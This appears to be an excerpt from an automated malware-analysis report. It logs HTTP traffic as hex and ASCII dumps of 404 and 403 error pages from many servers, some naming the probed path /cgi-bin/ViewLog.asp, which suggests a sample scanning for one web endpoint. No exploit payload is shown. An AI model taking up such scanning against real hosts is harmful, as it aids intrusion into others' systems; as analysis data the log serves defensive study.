Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundReferrer-Policy: no-referrerServer: thttpdContent-Type: text/html; charset=utf-8Date: Sun, 25 Feb 2024 18:03:08 GMTLast-Modified: Sun, 25 Feb 2024 18:03:08 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 68 31 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 68 65 69 67 68 74 3a 20 31 35 30 70 78 22 3e 0a 09 09 3c 73 70 61 6e 3e 0a 09 09 09 45 72 72 6f 72 20 34 30 34 2c 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a 09 09 3c 2f 73 70 61 6e 3e 0a 09 3c 2f 68 31 3e 0a 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 3c 2f 61 3e 0a 09 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <html><head></head><body><h1 style="text-align: center; height: 150px"><span>Error 404, Page not found</span></h1><div style="text-align: center;"><a href="/">Home</a></div></body></html><HR></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1064Date: Sun, 25 Feb 2024 18:03:09 GMTData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 25 Feb 2024 18:03:10 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Sun, 25 Feb 2024 18:03:10 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Web serverDate: Sun, 25 Feb 2024 18:02:56 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveX-Detail: 0x1210, insufficient security levelData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainVary: OriginX-Krakend-Completed: falseDate: Sun, 25 Feb 2024 18:03:11 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 25 Feb 2024 18:03:12 GMTServer: nginxX-Frame-Options: SAMEORIGINContent-Length: 199Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbidden
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Sun, 25 Feb 2024 18:03:11 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 25 Feb 2024 18:03:22 GMTServer: Microsoft-IIS/5.0Content-Length: 499Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0d 0a 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 75 63 2d 6b 72 22 20 2f 3e 0d 0a 09 3c 74 69 74 6c 65 3e 5b 34 30 34 5d 20 4e 6f 74 20 46 6f 75 6e 64 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 66 72 61 6d 65 73 65 74 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 6e 6f 22 20 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 20 63 6f 6c 73 3d 22 2a 22 3e 0d 0a 09 3c 66 72 61 6d 65 20 6e 61 6d 65 3d 22 6d 61 69 6e 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 65 73 6f 6c 75 74 69 6f 6e 2e 63 6f 6d 2f 68 74 74 70 65 72 72 6f 72 2f 6c 69 6e 75 78 2f 34 30 34 2e 68 74 6d 6c 22 20 6e 6f 72 65 73 69 7a 65 3d 22 6e 6f 72 65 73 69 7a 65 22 3e 3c 2f 66 72 61 6d 65 3e 0d 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=euc-kr" /><title>[404] Not Found Error</title></head><frameset frameborder="no" border="0" scrolling="no" cols="*"><frame name="main" src="http://www.nesolution.com/httperror/linux/404.html" noresize="noresize"></frame></frameset></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 25 Feb 2024 18:03:23 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 181Keep-Alive: timeout=15, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 4b 0f 82 30 10 84 ef fc 8a 95 bb 2c 1a 8e 4d 0f f2 88 24 88 c4 94 83 47 4c d7 94 04 69 a5 c5 c7 bf 97 c7 c5 e3 ec cc 37 b3 6c 93 9c 63 71 ad 52 38 8a 53 01 55 7d 28 f2 18 fc 2d 62 9e 8a 0c 31 11 c9 ea ec 83 10 31 2d 7d ee 31 e5 1e 1d 67 8a 1a 39 09 d7 ba 8e 78 14 46 50 6a 07 99 1e 7b c9 70 3d 7a 0c 97 10 bb 69 f9 9d b9 1d ff cb 4c ca 63 86 0b 45 30 d0 73 24 eb 48 42 7d 29 00 db 5e d2 27 30 ca c0 bb b1 d0 4f c8 7d 46 40 f7 e0 54 6b c1 d2 f0 a2 21 60 68 e6 89 a5 7c aa 9b 9f f2 7e 74 46 9f df cf 00 00 00 Data Ascii: MK0,M$GLi7lcqR8SU}(-b11-}1g9xFPj{p=ziLcE0s$HB})^'0O}F@Tk!`h\|~tF
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io;Content-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sun, 25 Feb 2024 18:03:25 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 25 Feb 2024 18:03:29 GMTContent-Type: text/htmlContent-Length: 665Connection: keep-aliveETag: "65db33bd-299"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 25 Feb 2024 19:04:50 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=180, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 25 Feb 2024 18:03:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$'gd*SJRl2MCAvAyyyr ;410
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Feb 2024 00:56:14 GMTServer: webCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Length: 1012Date: Sun, 25 Feb 2024 18:03:58 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 33 35 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 